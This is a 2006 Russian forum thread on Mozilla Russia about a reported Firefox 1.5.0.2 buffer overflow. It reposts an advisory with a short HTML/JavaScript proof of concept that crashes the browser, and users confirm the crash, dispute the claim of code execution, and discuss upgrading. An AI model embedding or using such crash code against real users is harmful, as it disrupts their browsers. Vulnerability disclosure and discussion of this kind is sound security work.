Полезная информация
№125-04-2006 12:30:33
- apocalypse_2010
- Участник
- Группа: Members
- Зарегистрирован: 16-12-2005
- Сообщений: 95
Переполнение буфера в Mozilla Firefox
25 апреля, 2006
Программа: Mozilla Firefox 1.5.0.2, возможно более ранние версии.
Опасность: Критическая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.
Уязвимость существует при обработке JavaScript кода в библиотеках js320.dll и xpcom_core.dll. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера и выполнит произвольный код на целевой системе. Пример:
<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
<script>
var textarea = document.getElementsByName("x_OtherInfo");
textarea=textarea.item(0);
var htmlarea = document.createElement("div");
htmlarea.className = "htmlarea";
textarea.parentNode.insertBefore(htmlarea, textarea);
var iframe = document.createElement("iframe");
htmlarea.appendChild(iframe);
var doc = iframe.contentWindow.document;
doc.designMode = "on";
doc.open();
doc.write("<iframe src=''>");
iframe.contentWindow.focus()
doc.close();
</script>
</textarea>
Решение: Способов устранения уязвимости не существует в настоящее время.
Отсутствует
№325-04-2006 17:32:02
Re: Переполнение буфера в Mozilla Firefox
Люди... Извините, сам проверить не могу, но судя по LOR (http://www.linux.org.ru/view-message.jsp?msgid=1367875&page=0) - поддвержены именно 1.5.0.2 версии...
Everyone is always connected. Serial Experiments Opera.
Отсутствует
№525-04-2006 19:39:28
- stoneflash
- Хитрый Лис
- Группа: Extensions
- Откуда: Msk
- Зарегистрирован: 02-04-2006
- Сообщений: 4341
Re: Переполнение буфера в Mozilla Firefox
Ага. Результат аналогичен. Прыгать на версию назад, что ли?
«I actually hate programming, but I love solving problems» © Rasmus Lerdorf, PHP's Creator
Отсутствует
№725-04-2006 20:52:23
- stoneflash
- Хитрый Лис
- Группа: Extensions
- Откуда: Msk
- Зарегистрирован: 02-04-2006
- Сообщений: 4341
Re: Переполнение буфера в Mozilla Firefox
krigstask
Млин, меж двух огней. Выбераю наименьшее зло.
«I actually hate programming, but I love solving problems» © Rasmus Lerdorf, PHP's Creator
Отсутствует
№925-04-2006 22:04:33
- stoneflash
- Хитрый Лис
- Группа: Extensions
- Откуда: Msk
- Зарегистрирован: 02-04-2006
- Сообщений: 4341
Re: Переполнение буфера в Mozilla Firefox
Почесал
Сейчас вообще по барабану. Мало ли - стукнет.
«I actually hate programming, but I love solving problems» © Rasmus Lerdorf, PHP's Creator
Отсутствует
№1026-04-2006 00:12:54
Re: Переполнение буфера в Mozilla Firefox
Если эта уязвимость то же самое, что описано на http://secunia.com/advisories/19802/ (что и есть, судя тому что пути к "эксплоиту" совпадают) - то эта уязвимость не позволяет выполнить "произвольный код на целевой системе", а является банальным кодом валящим браузер.
Опасность - 1 из 5, ничего интересного.
Do not meddle in the affairs of Wizards, for they are subtle and quick to anger.
Отсутствует
№1126-04-2006 00:16:57
Re: Переполнение буфера в Mozilla Firefox
Кому интересно, могут прочесть http://forums.mozillazine.org/viewtopic.php?t=408603
Do not meddle in the affairs of Wizards, for they are subtle and quick to anger.
Отсутствует
№1326-04-2006 02:14:50
Re: Переполнение буфера в Mozilla Firefox
:::: Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.8.0.2) Gecko/20060405 SeaMonkey/1.0.1 тоже падает
Закрой кран
Включи свет ©
Fire! Kill IE is your desire | NULL | NULL
Отсутствует
№1426-04-2006 11:26:24
- apocalypse_2010
- Участник
- Группа: Members
- Зарегистрирован: 16-12-2005
- Сообщений: 95
Re: Переполнение буфера в Mozilla Firefox
КСТАТЕ вот источник откуда я это скопировал http://www.securitylab.ru/vulnerability/266229.php ОЧЕНЬ ХОРОШИЙ САЙТ!
Отсутствует
№1526-04-2006 15:33:37
Re: Переполнение буфера в Mozilla Firefox
Решение: Способов устранения уязвимости не существует в настоящее время.
Существует, поставить v2.0a1, например.
:::: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1 - не падает.
Кому ничего не надо, с того нечего и потребовать.
©Генри Филдинг
Отсутствует
№1626-04-2006 23:33:37
Re: Переполнение буфера в Mozilla Firefox
Tearis
поставить v2.0a1, например.
Начиная с 25-го в nightly/latest 1.5.0.2 поехали локализации (включая и mar-файлы), на сегодня уже почти полный набор. Русская, к примеру, проявилась - 25-Apr-2006 19:53. Мне просто некогда качать и проверять (сам на .0.3-й), ежели кого плющит по безопасности - попробуйте.
Отсутствует
Board footer
Powered by PunBB
Modified by Mozilla Russia
Copyright © 2004–2020 Mozilla Russia 
Язык отображения форума: [Русский] [English]